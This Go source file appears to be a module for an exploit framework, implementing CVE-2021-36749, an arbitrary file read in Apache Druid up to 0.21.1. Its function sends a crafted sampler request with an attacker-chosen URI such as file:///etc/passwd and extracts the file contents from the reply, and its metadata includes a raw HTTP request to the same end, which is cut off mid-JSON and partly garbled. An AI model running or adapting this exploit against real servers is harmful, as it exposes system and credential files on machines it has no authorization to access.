package exp_Druid

import (
	"github.com/lz520520/railgunlib/pkg/register/exp_register"
	"github.com/lz520520/railgunlib/pkg/templates/exp_model"
	"github.com/lz520520/railgunlib/pkg/templates/exp_templates"
	"regexp"
	"strings"
)

type Exp_CVE_2021_36749 struct {
	exp_templates.ExpTemplate
}

func (self *Exp_CVE_2021_36749) GetMsg1(cmd string) (expResult exp_model.ExpResult) {

	headers := self.GetInitExpHeaders()             //获取header
	headers.Set("Content-Type", "application/json") //设置格式
	//设置poc
	payload := `{"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "http", "uris": ["l1ang"]}}, "dataSchema": {"dataSource": "sample", "parser": {"type": "string", "parseSpec": {"format": "regex", "pattern": "(.*)", "columns": ["a"], "dimensionsSpec": {}, "timestampSpec": {"column": "!!!_no_such_column_!!!", "missingValue": "2010-01-01T00:00:00Z"}}}}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}`
	//替换poc
	payload = strings.Replace(payload, "l1ang", cmd, 1)

	//发送请求
	httpresp := self.HttpPostWithoutRedirect(self.AppendUri(self.Params.Target, "/druid/indexer/v1/sampler?for=connect"), payload, headers)
	if httpresp.Err != nil {
		expResult.Err = httpresp.Err
		return
	}
	tmp1, _ := regexp.Compile(`"input":{"a":"(.*?)"`)
	tmp2 := tmp1.FindAllString(httpresp.Body, -1)
	tmp3 := strings.Join(tmp2, "")
	tmp4 := strings.ReplaceAll(tmp3, `""input":{"a":"`, "\r\n")
	if len(tmp4) == 0 {
		self.EchoInfoMsg("漏洞利用失败或文件不存在！！")
	} else {
		res := tmp4[14 : len(tmp4)-1]
		expResult.Result = res
	}
	return
}

func init() {
	expmsg := exp_model.ExpMsg{
		Author:   "凉风",
		Time:     `2022-05-19`,
		Range:    `Apache Druid <= v0.21.1`,
		ID:       `CVE-2021-36749`,
		Describe: `Apache Druid 任意文件读取漏洞`,
		Details:  `格式：file:///etc/passwd 更改文件即可`,
		Payload: `
POST/druid/indexer/v1/sampler?for=connectHTTP/1.1 
Host:www.cisp-pte.com
Content-Length:423 
Accept:application/json,text/plain,*/*
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,like Gecko)Chrome/95.0.4638.54Safari/537.36 
Content-Type:application/json;charset=UTF-8 
Accept-Encoding:gzip,deflate 
Accept-Language:zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 
Connection:close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSche ma":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":
`,
		VulType:   `任意文件读取`,
		Reference: `http://wiki.cisp-pte.com/#/wiki`,
	}

	registerMsg := exp_register.ExpRegisterMsg{
		Msg: expmsg,
	}
	exp_register.ExpStructRegister(&Exp_CVE_2021_36749{}, registerMsg)

}
